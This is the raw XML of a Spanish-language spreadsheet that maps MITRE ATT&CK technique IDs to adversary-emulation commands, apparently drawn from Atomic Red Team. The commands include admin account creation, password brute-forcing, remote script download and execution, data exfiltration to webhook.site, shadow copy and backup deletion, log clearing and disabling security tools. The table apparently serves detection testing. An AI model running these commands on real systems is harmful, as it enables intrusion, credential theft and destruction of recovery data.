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W:\Documentos\Proyectos\GestiónVuln\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0DFB44E8-96CE-463D-8E54-3173668E79B2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10420" activeTab="1" xr2:uid="{E5935A6D-DA8D-4189-92CA-8462E0191085}"/>
  </bookViews>
  <sheets>
    <sheet name="Completo" sheetId="1" r:id="rId1"/>
    <sheet name="ISO" sheetId="2" r:id="rId2"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId3"/>
  </externalReferences>
  <definedNames>
    <definedName name="IP">[1]NombreHost!$A:$B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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="760" uniqueCount="336">
  <si>
    <t>Tecnica_ID</t>
  </si>
  <si>
    <t>Referencia de la tecnica</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Adfind - Enumerate Active Directory Admins</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Adfind - Enumerate Active Directory Trusts</t>
  </si>
  <si>
    <t>Adfind - Enumerate Active Directory Exchange AD Objects</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Adfind - Enumerate Active Directory Domain Controller Objects</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Enumerate Active Directory Groups with Get-AdGroup</t>
  </si>
  <si>
    <t>Adfind -Listing password policy</t>
  </si>
  <si>
    <t>Discover local hosts</t>
  </si>
  <si>
    <t>Discover Domain Admins</t>
  </si>
  <si>
    <t>Enumerate Active Directory Computers with Get-AdComputer</t>
  </si>
  <si>
    <t>Get-wmiobject to Enumerate Domain Controllers</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy</t>
  </si>
  <si>
    <t>Enumerate Root Domain linked policies Discovery</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>Copy NTDS.dit from Volume Shadow Copy</t>
  </si>
  <si>
    <t>Create Symlink to Volume Shadow Copy</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with WMI</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with Powershell</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Crafting Active Directory golden tickets with mimikatz</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Remote Process Injection in LSASS via mimikatz</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>Find OS Version</t>
  </si>
  <si>
    <t>Hostname Discovery (Windows)</t>
  </si>
  <si>
    <t>Remote System Discovery - arp</t>
  </si>
  <si>
    <t>Remote System Discovery - nslookup</t>
  </si>
  <si>
    <t>Remote System Discovery - net group Domain Computers</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Port Scan NMap for Windows</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>Find System Network Connections</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>List Windows Firewall Rules</t>
  </si>
  <si>
    <t>Network Interface Configuration</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery - get-wmiObject</t>
  </si>
  <si>
    <t>PowerShell Process Enumeration</t>
  </si>
  <si>
    <t>Process Discovery - tasklist</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery command prompt</t>
  </si>
  <si>
    <t>Network Share Discovery PowerShell</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>Discover system services</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Permission Groups Discovery PowerShell (Local)</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>List Directory</t>
  </si>
  <si>
    <t>Enumerate all accounts (Domain)</t>
  </si>
  <si>
    <t>Account Discovery (all)</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Enumerate all accounts on Windows (Local)</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)</t>
  </si>
  <si>
    <t>Detect Virtualization Environment (Windows)</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Applications Installed</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Discover antivirus programs</t>
  </si>
  <si>
    <t>GetDomain</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Display group policy information via gpresult</t>
  </si>
  <si>
    <t>Examine domain password policy - Windows</t>
  </si>
  <si>
    <t>Examine local password policy - Windows</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Create a Process using WMI Query and an Encoded Command</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled task Local</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Encoded VBS code execution</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Suspicious Execution via Windows Command Shell</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>Execute PowerShell script via Word DDE</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Execute a Command as a Service</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Create a new Windows admin user</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Create a new Windows domain admin user</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell Written to Disk</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Service Installation CMD</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Netsh Helper DLL Registration</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Add Executable Shortcut Link to User Startup Folder</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Inject Cred dumper into process (Spookier)</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>Deadman - Delete agent file</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry of Local Machine - cmd</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files Or Information</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Invoke-WMIExec Pass the Hash</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable Microsoft Defender Firewall</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Service ImagePath Change with reg.exe</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using Out-Minidump.ps1</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using ProcDump</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Sniff network traffic</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Extracting passwords with findstr</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Find private keys</t>
  </si>
  <si>
    <t>Windows Internal Packet Capture</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>Map admin share</t>
  </si>
  <si>
    <t>Execute command writing output to local Admin Share</t>
  </si>
  <si>
    <t>Mimikatz Pass the Hash</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Copy a sensitive File over Administive share with Powershell</t>
  </si>
  <si>
    <t>Copy a sensitive File over Administive share with copy</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Create staging directory</t>
  </si>
  <si>
    <t>Stage data from Discovery.bat</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Compress Data and lock with password for Exfiltration with winrar</t>
  </si>
  <si>
    <t>Compress staged directory</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Tor Proxy Usage - Windows</t>
  </si>
  <si>
    <t>Psiphon</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Malicious User Agents - CMD</t>
  </si>
  <si>
    <t>Malicious User Agents - Powershell</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>DNS Long Domain Query</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>ICMP C2</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Install PSTools</t>
  </si>
  <si>
    <t>File Download via PowerShell</t>
  </si>
  <si>
    <t>Curl Download File</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>XOR Encoded data.</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>DNS over HTTPS Large Query Volume</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Data Exfiltration with ConfigSecurityPolicy</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Windows - Stop service using net.exe</t>
  </si>
  <si>
    <t>Windows - Stop service using Service Controller</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>Running Chrome VPN Extensions via the Registry 2 vpn extension</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>USB Malware Spread Simulation</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Create local account with admin privileges</t>
  </si>
  <si>
    <t>PowerShell Command Execution</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Admin Account Manipulate</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>UACME Bypass Method 33</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>LockBit Black - Modify Group policy settings -cmd</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Testing usage of uncommonly used port with PowerShell</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>IcedID Botnet HTTP PUT</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltrate data HTTPS using curl windows</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Windows - Overwrite file with Sysinternals SDelete</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>Potentially Unwanted Applications (PUA)</t>
  </si>
  <si>
    <t>Excel 4 Macro</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Download Macro-Enabled Phishing Attachment</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Disable Event Logging with wevtutil</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Edit an existing time provider</t>
  </si>
  <si>
    <t>Hide Windows Clock Group Policy Feature</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>attrib - Remove read-only attribute</t>
  </si>
  <si>
    <t>attrib - hide file</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>WinPwn - DomainPasswordSpray Attacks</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>C2 Data Exfiltration</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Leave note</t>
  </si>
  <si>
    <t xml:space="preserve">T1490 </t>
  </si>
  <si>
    <t>Windows - Delete Volume Shadow Copies via WMI</t>
  </si>
  <si>
    <t>net user /add "T1136.001_Admin" "T1136_pass" &amp;&amp; net localgroup administrators "T1136.001_Admin" /add</t>
  </si>
  <si>
    <t>net user "T1136.002_Admin" "T1136_pass123!" /add /domain &amp;&amp; net group "Domain Admins" "#T1136.002_Admin" /add /domain</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f</t>
  </si>
  <si>
    <t>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f</t>
  </si>
  <si>
    <t>net.exe stop spooler</t>
  </si>
  <si>
    <t>sc.exe stop spooler</t>
  </si>
  <si>
    <t>LockBit Black - Modify Group policy settings -Powershell</t>
  </si>
  <si>
    <t>New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force; New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force; New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force; New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force; New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force; New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe; &amp; "$env:TEMP/PotentiallyUnwanted.exe"</t>
  </si>
  <si>
    <t>C:\Windows\System32\Curl.exe -s -A "HttpBrowser/1.0" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "*&lt;|&gt;*" -m3 www.google.com &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null; Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null; Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null; Invoke-WebRequest www.google.com -UserAgent "*&lt;|&gt;*" | out-null</t>
  </si>
  <si>
    <t>$RemovableDrives=@(); $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID; ForEach ($Drive in $RemovableDrives) { write-host "Removable Drive Found:" $Drive; New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives." }</t>
  </si>
  <si>
    <t>$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm</t>
  </si>
  <si>
    <t>wevtutil sl "Microsoft-Windows-IKE/Operational" /e:false</t>
  </si>
  <si>
    <t>certutil -encode C:\Windows\System32\calc.exe %temp%\T1140_calc.txt &amp;&amp; certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe</t>
  </si>
  <si>
    <t>$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable; if (-not $RequiredModule) {Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force};  ;  Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop</t>
  </si>
  <si>
    <t>At.exe Scheduled task</t>
  </si>
  <si>
    <t>at 13:20 /interactive cmd</t>
  </si>
  <si>
    <t>SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</t>
  </si>
  <si>
    <t>Persist, Download, &amp; Execute</t>
  </si>
  <si>
    <t>bitsadmin.exe /create AtomicBITS &amp;&amp; bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 &amp;&amp; bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe NULL &amp;&amp; bitsadmin.exe /resume AtomicBITS &amp;&amp; ping -n 5 127.0.0.1 &gt;nul 2&gt;&amp;1 &amp;&amp; bitsadmin.exe /complete AtomicBITS</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>$Server="#{logonserver}"; $User="#{username}"; $Password="#{password}"; cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password; mstsc /v:$Server; echo "RDP connection established"</t>
  </si>
  <si>
    <t>RDP to Server</t>
  </si>
  <si>
    <t>cmd.exe /c "net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator"</t>
  </si>
  <si>
    <t>Get-AdGroup -Filter *</t>
  </si>
  <si>
    <t>Import-Module .\powerview.ps1;Get-NetLocalGroupMember -ComputerName exchange.windomain.local</t>
  </si>
  <si>
    <t>Get-LocalGroup; Get-LocalGroupMember -Name "Administrators";([ADSI]"WinNT://./Administrators").psbase.Invoke('Members') | % {([ADSI]$_).InvokeGet('AdsPath')}</t>
  </si>
  <si>
    <t>gpresult /R</t>
  </si>
  <si>
    <t>Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe https://nmap.org/dist/nmap-7.80-setup.exe;Start-Process $env:temp\nmap-7.80-setup.exe /S;nmap 127.0.0.1</t>
  </si>
  <si>
    <t>Import-Module ./basic_scanner.ps1;$ports = @(22, 53, 80, 445);
Get-NetIPConfiguration | ?{$_.NetAdapter.Status -ne "Disconnected"} | Get-NetIPaddress -AddressFamily IPv4 | %{
    $ipv4 = $_.IPAddress;
    $prefixLength = $_.PrefixLength;
    Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;
};</t>
  </si>
  <si>
    <t>netstat -anto;Get-NetTCPConnection</t>
  </si>
  <si>
    <t>netstat &amp;&amp; net use &amp;&amp; net sessions</t>
  </si>
  <si>
    <t>if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {;   Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported";   exit 1; }; [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null; $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389); $passwordList = Get-Content -Path 5cb955_passwords.txt; foreach ($password in $passwordList){;   $credz = new-object System.Net.NetworkCredential("$ENV:USERNAME", $password, "$env:UserDnsDomain");   $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM);   try {;     Write-Host " [-] Attempting ${password} on account $ENV:USERNAME.";     $conn.bind();     Write-Host " [!] $ENV:USERNAME:${password} are valid credentials!";   } catch {;     Write-Host $_.Exception.Message;   }; }; Write-Host "End of bruteforce"</t>
  </si>
  <si>
    <t>$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'; iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1'); domainpassspray -consoleoutput -noninteractive -emptypasswords</t>
  </si>
  <si>
    <t>cmd.exe /Q /c hostname 1&gt; \\127.0.0.1\ADMIN$\output.txt 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Write-Host 'Please Enable "C$" share on 127.0.0.1';Out-File -FilePath "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password";copy-item -Path "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password" -Destination "$Env:TEMP\Easter_egg.password"</t>
  </si>
  <si>
    <t>copy \\127.0.0.1\C$\Windows\temp\Easter_Bunny.password %TEMP%\Easter_egg.password</t>
  </si>
  <si>
    <t>if(-not (Test-Path $env:TEMP\LineNumbers.txt)){ ;   1..100 | ForEach-Object { Add-Content -Path $env:TEMP\LineNumbers.txt -Value "This is line $_." }; }; [System.Net.ServicePointManager]::Expect100Continue = $false; $filecontent = Get-Content -Path $env:TEMP\LineNumbers.txt; Invoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive</t>
  </si>
  <si>
    <t>$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe";  $path[0] c:\temp\config.xml "https://webhook.site?d=sensitive-data-here"</t>
  </si>
  <si>
    <t>$x = Get-Random -Minimum 2 -Maximum 9999; $y = Get-Random -Minimum 2 -Maximum 9999; $z = Get-Random -Minimum 2 -Maximum 9999; $w = Get-Random -Minimum 2 -Maximum 9999; Write-Host HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name; foreach($member in $fmm) {;     if($member -like "*Administrator*") {;         $account = $member.Name -replace ".+\\\";         $originalDescription = (Get-LocalUser -Name $account).Description;         Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48);         Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z";         Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME;         };     }</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Get-ChildItem C:\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;
exit 0;</t>
  </si>
  <si>
    <t>Find files</t>
  </si>
  <si>
    <t>Windows - wbadmin Delete systemstatebackup</t>
  </si>
  <si>
    <t>wbadmin delete systemstatebackup -keepVersions:0</t>
  </si>
  <si>
    <t>Windows - wbadmin Delete Windows Backup Catalog</t>
  </si>
  <si>
    <t>wbadmin delete catalog -quiet</t>
  </si>
  <si>
    <t>wmic.exe shadowcopy delete</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>wmic /NAMESPACE:\\root\SecurityCenter2 PATH AntiVirusProduct GET /value</t>
  </si>
  <si>
    <t>Disable Windows Notification Center</t>
  </si>
  <si>
    <t>reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>Disable Windows Security Center Notifications</t>
  </si>
  <si>
    <t>reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f</t>
  </si>
  <si>
    <t>Disable Windows Registry Tool</t>
  </si>
  <si>
    <t>reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>Clear Event Logs via VBA</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing); Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"</t>
  </si>
  <si>
    <t>Clear Logs</t>
  </si>
  <si>
    <t>Clear-Eventlog Security;
Clear-Eventlog System;</t>
  </si>
  <si>
    <t>Delete System Logs Using Clear-EventLog</t>
  </si>
  <si>
    <t>$logs = Get-EventLog -List | ForEach-Object {$_.Log}; $logs | ForEach-Object {Clear-EventLog -LogName $_ }; Get-EventLog -list</t>
  </si>
  <si>
    <t>Uninstall Sysmon</t>
  </si>
  <si>
    <t>sysmon -u</t>
  </si>
  <si>
    <t xml:space="preserve">ID TTP </t>
  </si>
  <si>
    <t>Nombre</t>
  </si>
  <si>
    <t>Comando</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>$x = Get-Process | Where-Object {$_.MainWindowTitle -ne ""} | Select-Object MainWindowTitle;
$a = New-Object -com "Shell.Application"; $b = $a.windows() | select-object LocationName;
write-host ($x | Format-List | Out-String) ($b | Format-List | Out-String)</t>
  </si>
  <si>
    <t>Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName</t>
  </si>
  <si>
    <t>[environment]::OSVersion.Version</t>
  </si>
  <si>
    <t>hostname</t>
  </si>
  <si>
    <t>systeminfo &amp;&amp; reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum</t>
  </si>
  <si>
    <t>Capitulo 13</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>LLMNR Poisoning with Inveigh (PowerShell)</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr "https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1" -UseBasicParsing); Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y</t>
  </si>
  <si>
    <t>12011c_AdFind.exe -sc dclist</t>
  </si>
  <si>
    <t>Import-Module .\powerview.ps1;Get-DomainComputer</t>
  </si>
  <si>
    <t>Get-AdComputer -Filter *</t>
  </si>
  <si>
    <t>get-wmiobject -class ds_computer -namespace root\directory\ldap</t>
  </si>
  <si>
    <t>arp -a</t>
  </si>
  <si>
    <t>$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]; $pieces = $localip.split("."); $firstOctet = $pieces[0]; $secondOctet = $pieces[1]; $thirdOctet = $pieces[2]; foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}</t>
  </si>
  <si>
    <t>net group "Domain Computers" /domain</t>
  </si>
  <si>
    <t>$path = "$ENV:UserProfile\Desktop\pcap.etl";New-NetEventSession -Name "PCAP" -CaptureMode SaveToFile -LocalFilePath $path;Add-NetEventProvider -Name "Microsoft-Windows-TCPIP" -SessionName "PCAP";Start-NetEventSession -Name "PCAP";Start-Sleep -s 60;Stop-NetEventSession -Name "PCAP";if (Test-Path $path) {  echo $path;  exit 0;} else {  echo "Failed to generate PCAP file.";  exit 1;};</t>
  </si>
  <si>
    <t>netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10</t>
  </si>
  <si>
    <t>psh</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
